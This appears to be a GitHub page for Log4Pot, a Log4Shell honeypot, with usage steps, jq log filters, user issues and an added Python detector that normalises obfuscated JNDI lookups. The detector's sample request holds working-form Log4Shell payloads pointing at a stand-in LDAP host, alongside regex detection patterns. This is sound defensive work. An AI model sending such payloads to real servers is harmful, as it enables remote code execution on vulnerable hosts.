A honeypot for the Log4Shell vulnerability (CVE-2021-44228)

Overview

Log4Pot

A honeypot for the Log4Shell vulnerability (CVE-2021-44228).

License: GPLv3.0

Features

  • Listen on various ports for Log4Shell exploitation.
  • Detect exploitation in request line and headers.
  • Log to file and Azure blob storage.
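As an added example (not Log4Pot's own code), the following Python snippet shows the detection side of the feature list in working form: it checks the request line and every header for the Log4j JNDI lookup, resolves the nested `${lower:}`, `${upper:}` and `${x:-y}` lookups that Log4j evaluates so that an obfuscated lookup is still recognised, and emits JSON records in the layout of the `"request"` lines quoted further down this page. The `"exploit"` record layout beyond `type` and `payload`, the `location` field, the regular expressions and the sample request (with TEST-NET addresses) are assumptions constructed for the example.

```python
import json
import re
import uuid
from datetime import datetime, timezone

# The indicator after normalisation. Log4j matches lookup names
# case-insensitively, so the detector does too.
JNDI_RE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)

# Documented Log4j lookups that can be nested inside a lookup to avoid the
# literal string "${jndi:": ${lower:j}, ${upper:J} and the default-value
# form ${name:-j}. A detector resolves them inside-out before matching.
# (Regexes are assumptions written for this example.)
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize(value: str) -> str:
    """Resolve innermost lower/upper/default lookups until nothing changes."""
    prev = None
    while prev != value:
        prev = value
        value = _LOWER.sub(lambda m: m.group(1).lower(), value)
        value = _UPPER.sub(lambda m: m.group(1).upper(), value)
        value = _DEFAULT.sub(lambda m: m.group(1), value)
    return value


def find_jndi(request_line: str, headers: dict) -> list:
    """Return (location, original_value) pairs for every place the lookup appears."""
    hits = []
    if JNDI_RE.search(normalize(request_line)):
        hits.append(("request", request_line))
    for name, value in headers.items():
        if JNDI_RE.search(normalize(value)):
            hits.append((f"header:{name}", value))
    return hits


def log_records(client: str, client_port: int, server_port: int,
                request_line: str, headers: dict) -> list:
    """One "request" record per request plus one "exploit" record per hit,
    sharing a correlation_id so the two can be joined later with jq."""
    cid = str(uuid.uuid4())
    ts = datetime.now(timezone.utc).replace(tzinfo=None).isoformat()
    records = [{
        "type": "request", "timestamp": ts, "correlation_id": cid,
        "server_port": server_port, "client": client, "port": client_port,
        "request": request_line, "headers": headers,
    }]
    for location, payload in find_jndi(request_line, headers):
        records.append({
            "type": "exploit", "timestamp": ts, "correlation_id": cid,
            "server_port": server_port, "client": client, "port": client_port,
            "location": location, "payload": payload,   # "location" is an assumed extra field
        })
    return records


# Constructed sample request: one plain lookup in the query string and one
# obfuscated lookup in the User-Agent header.
SAMPLE_REQUEST = "GET /?x=${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1"
SAMPLE_HEADERS = {
    "Host": "203.0.113.10:8080",
    "User-Agent": "${${lower:j}ndi:ldap://198.51.100.7:1389/a}",
    "Accept": "*/*",
}

if __name__ == "__main__":
    for rec in log_records("198.51.100.7", 41482, 8080, SAMPLE_REQUEST, SAMPLE_HEADERS):
        print(json.dumps(rec))
```

Running the block prints three JSON lines: the request record and two exploit records (query string and User-Agent), all carrying the same `correlation_id`.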

Usage

  1. Install Poetry: curl -sSL https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py | python3 -
  2. Fetch this GitHub repository: git clone https://github.com/thomaspatzke/Log4Pot.git
  3. Change directory into the local copy with cd Log4Pot
  4. Install dependencies: poetry install
  5. Put parameters into log4pot.conf.
  6. Run: poetry run python log4pot.py @log4pot.conf

Alternatively, you can run log4pot without the external dependencies:

$ python log4pot.py @log4pot.conf

This will run log4pot without support for logging to Azure blob storage.

Analyzing Logs with JQ

List payloads from exploitation attempts:

select(.type == "exploit") | .payload

Decode all base64-encoded payloads from JNDI exploit:

select(.type == "exploit" and (.payload | contains("Base64"))) | .payload | sub(".*/Base64/"; "") | sub("}$"; "") | @base64d

Comments
  • Attempt to run Log4pot

    Hello,

    I am trying to run log4pot.py without any dependencies as mentioned in the Readme, as follows: python log4pot.py -p 8080

    I am having a syntax error on line 96: if (m := ). This is an invalid syntax, also what is the m variable?

    Please note, I tried to replace it with if (m==), I got an error that m is not defined.

    Any help please on this? Thank you

    opened by josephKhoury95 5
  • Getting an error: No module named 'pycurl'

    Hello,

    Is anyone getting this error:

    Pycurl not available or there is an issue with curl dependencies: No module named 'pycurl'

    I tried installing pycurl for both Python2 and Python3, using these commands.

    pip install pycurl

    pip3 install pycurl

    Both of these were already satisfied.

    opened by rangerrkm 5
  • error on non-azure installation

    FYI --

    $ python3 log4pot.py @log4pot.conf
    Azure dependencies not installed, logging to blob storage not available.
    usage: log4pot.py [-h] [--port PORT] [--log LOG] [--blob-connection-string BLOB_CONNECTION_STRING] [--log-container LOG_CONTAINER] [--log-blob LOG_BLOB] [--server-header SERVER_HEADER]
    log4pot.py: error: unrecognized arguments: storage connection string as provided in UI>
    
    opened by finchy 2
  • Exception

    Just noticed the following exception:

    ----------------------------------------
    Exception occurred during processing of request from ('x.x.x.x', 55160)
    Traceback (most recent call last):
      File "/usr/lib/python3.9/socketserver.py", line 683, in process_request_thread
        self.finish_request(request, client_address)
      File "/usr/lib/python3.9/socketserver.py", line 360, in finish_request
        self.RequestHandlerClass(request, client_address, self)
      File "/usr/lib/python3.9/socketserver.py", line 747, in __init__
        self.handle()
      File "/usr/lib/python3.9/http/server.py", line 427, in handle
        self.handle_one_request()
      File "/usr/lib/python3.9/http/server.py", line 395, in handle_one_request
        self.raw_requestline = self.rfile.readline(65537)
      File "/usr/lib/python3.9/socket.py", line 704, in readinto
        return self._sock.recv_into(b)
    ConnectionResetError: [Errno 104] Connection reset by peer
    ----------------------------------------
    x.x.x.x - - [16/Dec/2021 13:44:23] "GET / HTTP/1.1" 200 -
    x.x.x.x - - [16/Dec/2021 13:44:23] "GET / HTTP/1.1" 200 -
    

    The according JSON log:

    {"type": "request", "timestamp": "2021-12-16T13:44:23.029029", "correlation_id": "39f57c86-3b8a-46da-8ac1-568030215755", "server_port": 80, "client": "x.x.x.x", "port": 41482, "request": "GET / HTTP/1.1", "headers": {"Host": "y.y.y.y:80"}}
    {"type": "request", "timestamp": "2021-12-16T13:44:23.258082", "correlation_id": "c01af0fb-dcdc-41f3-af09-8680c6c99d81", "server_port": 80, "client": "x.x.x.x", "port": 37514, "request": "GET / HTTP/1.1", "headers": {"Host": "y.y.y.y", "User-Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Accept": "*/*", "Accept-Encoding": "gzip"}}
    
    opened by t3chn0m4g3 2
  • Remove old installer

    Hello,

    I removed the deprecated installer for poetry as mentioned in their documentation and added the pyp alternative. Also added the sudo for some cases as well as the azure package that was missing when I tried to launch the script.

    opened by Thomasrgx 1
  • Implemented base64 decoding of javaSerializedData

    Automatic decoding of serialized java classes, such as Mirai stuff below:

    {
      ...
      "DN": "o=tomcat",
      "javaClassName": "java.lang.String",
      "javaSerializedData": "...",
      ...
    }
    

    The data should be decoded and written to a file if enabled. Payload was unfortunately already yeeted and therefore not available for testing anymore.

    opened by 3c7 0
  • Implement customizable download timeout

    :eyes: {"type": "exception", "timestamp": "2021-12-18T08:08:46.728625", "exception": "(28, 'Connection timed out after 3000 milliseconds')"}

    opened by 3c7 0
  • Deobfuscate payloads

    This PR adds another key to log entries which includes the deobfuscated payload. This probably does not work reliably in every case, but it was tested with lots of ITW jndi payloads.

    opened by 3c7 0
Owner
Thomas Patzke
Loves to build InfoSec-related tools.